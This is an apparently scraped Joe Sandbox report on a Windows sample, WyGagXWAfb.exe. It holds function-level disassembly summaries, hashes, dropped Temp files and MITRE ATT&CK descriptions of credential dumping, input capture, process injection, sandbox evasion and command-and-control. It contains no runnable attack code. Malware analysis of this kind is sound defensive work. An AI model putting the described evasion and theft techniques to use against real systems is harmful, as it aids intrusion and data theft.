Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: e008be8a5382371681bf0ea48fda3af8224167524ee3a4dce21a63178fe49763
Instruction ID: a5530707185c89da512f109b493440137ebe6a7c198050837ede75de8f747f07
Opcode Fuzzy Hash: e008be8a5382371681bf0ea48fda3af8224167524ee3a4dce21a63178fe49763
Instruction Fuzzy Hash: 12118235500205ABDB20BFA4CC86FBDB7A5EF44320F5085A6E911A72A1DE71A815C795

Function 00B692E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

Part of subcall function 00B6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B6B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B69355

Strings

ListBox, xrefs: 00B6931F
ComboBox, xrefs: 00B692F4

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 99215d0f5678197707bb8c5680a8c27536e05228c3372dbf7fa5742156221c55
Instruction ID: cc10728606b2fa759b359f08e27073faed963536ff6c8967b34790308258754b
Opcode Fuzzy Hash: 99215d0f5678197707bb8c5680a8c27536e05228c3372dbf7fa5742156221c55
Instruction Fuzzy Hash: B2019A71A45218AB8B04EBA4CC92CFE77EDFF46320B54069AB832973D2DF3559488660

Function 00B7901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B79036
__fread_nolock.LIBCMT ref: 00B7904B

Strings

EA06, xrefs: 00B7907D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: f896cd7c6912bad816addcbe461acca89ed8152254fe4496a5fcfe7d215e7ecb
Instruction ID: bf906d4ac6ebfcd63fc7ac6c359b969662fbb90bcc684b4f35fdeadac5c8c926
Opcode Fuzzy Hash: f896cd7c6912bad816addcbe461acca89ed8152254fe4496a5fcfe7d215e7ecb
Instruction Fuzzy Hash: C701B9719142586EDB28C6A8C856FEEBBFCDB15301F0045DEF556D2181E575A7048760

Function 00B691DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

Part of subcall function 00B6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B6B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 00B6924D

Strings

ListBox, xrefs: 00B69217
ComboBox, xrefs: 00B691EC

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 38cd3aae50cf35be81fdf61fa58f7136cceb987cc7774e8995cc7c51fa0c82cf
Instruction ID: cbf5b0c4e25541b665bf85c7ef2f728bcd6f319603400e9081d6734587ae6db2
Opcode Fuzzy Hash: 38cd3aae50cf35be81fdf61fa58f7136cceb987cc7774e8995cc7c51fa0c82cf
Instruction Fuzzy Hash: 6C01A771A81204BBCB14EBA0C9A6EFF77ECDF55300F640099B912A7291EF255F4C9671

Function 00B69264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

Part of subcall function 00B6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B6B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 00B692D0

Strings

ListBox, xrefs: 00B6929C
ComboBox, xrefs: 00B69271

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 3f3bfa4ea0162bd49c15b14c2303779db5dc1804f965f27dae821d0a71b390da
Instruction ID: bd9aab947ca1f5c431a479b65467cff5e17ed23f9291d5ecdf46306ca5aa31a5
Opcode Fuzzy Hash: 3f3bfa4ea0162bd49c15b14c2303779db5dc1804f965f27dae821d0a71b390da
Instruction Fuzzy Hash: 3C01A271A81208B7DB14EBA0C992EFF77EC9F11700F64019AB912A3292DA355E4C9671

Function 00B751CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00B751E8
_wcscmp.LIBCMT ref: 00B751FA

Strings

#32770, xrefs: 00B751F4

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: fa73ef9c860e0249d1cfd3c2cc502bfc3e3595f01cf960540668d95bfb723c28
Instruction ID: e4040b7cab423350f836945a196251da46f9858c696c00c6bff7bef70e0098bc
Opcode Fuzzy Hash: fa73ef9c860e0249d1cfd3c2cc502bfc3e3595f01cf960540668d95bfb723c28
Instruction Fuzzy Hash: C4E0613290022D17D3209A95AC05FA7F7ECEB40771F00009BFD14D7050E9609D0487E1

Function 00B681BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B681CA

Part of subcall function 00B33598: _doexit.LIBCMT ref: 00B335A2

Strings

Error allocating memory., xrefs: 00B681C3
AutoIt, xrefs: 00B681BE

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 8be7c4f9887c71aa7ffa4341e04ecd355219c7e40e544cb07fa24b4818079ff7
Instruction ID: c10f5072cb70d5dfbf81cbf3d46b428fb94c8cba50d328b1ea5598331bf80515
Opcode Fuzzy Hash: 8be7c4f9887c71aa7ffa4341e04ecd355219c7e40e544cb07fa24b4818079ff7
Instruction Fuzzy Hash: 71D05B323C531832D21532F96D0BFC675C8CB19F62F1044A6BB08955D38ED559D142D9

Function 00B4B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00B4B564: _memset.LIBCMT ref: 00B4B571

Part of subcall function 00B30B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B4B540,?,?,?,00B1100A), ref: 00B30B89

IsDebuggerPresent.KERNEL32(?,?,?,00B1100A), ref: 00B4B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B1100A), ref: 00B4B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B4B54E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 994ef30be84da5978980455ed920a62ea9e05bf6a7dea275b363ebc8231716d5
Instruction ID: 42df7564cc16b3cbaa2cbf6e14b757754c14cfc4c1f46d1105488f66be121e09
Opcode Fuzzy Hash: 994ef30be84da5978980455ed920a62ea9e05bf6a7dea275b363ebc8231716d5
Instruction Fuzzy Hash: 03E092706107118FD720EF29E514B96BBE0AF14754F0089ADF546C3660EBF4E544CB61

Function 00B95BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B95BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B95C08

Part of subcall function 00B754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B7555E

Strings

Shell_TrayWnd, xrefs: 00B95BEE

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: a64d91f3cbaf40c4f60969640fb12e75a8e93b10c86e729cdcd007fd12d1488b
Instruction ID: 250e44e034bb2242c038fca27cde5c7c930ea5c34d84cfeadc5ccaf9823c1d65
Opcode Fuzzy Hash: a64d91f3cbaf40c4f60969640fb12e75a8e93b10c86e729cdcd007fd12d1488b
Instruction Fuzzy Hash: A5D0A931388302BBE334AB30AC0BFA32A50AB00B20F00082AB219EA1E0C8E05840C200

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WyGagXWAfb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\579HX29

C:\Users\user\AppData\Local\Temp\Dalis

C:\Users\user\AppData\Local\Temp\autAA6A.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
WyGagXWAfb.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre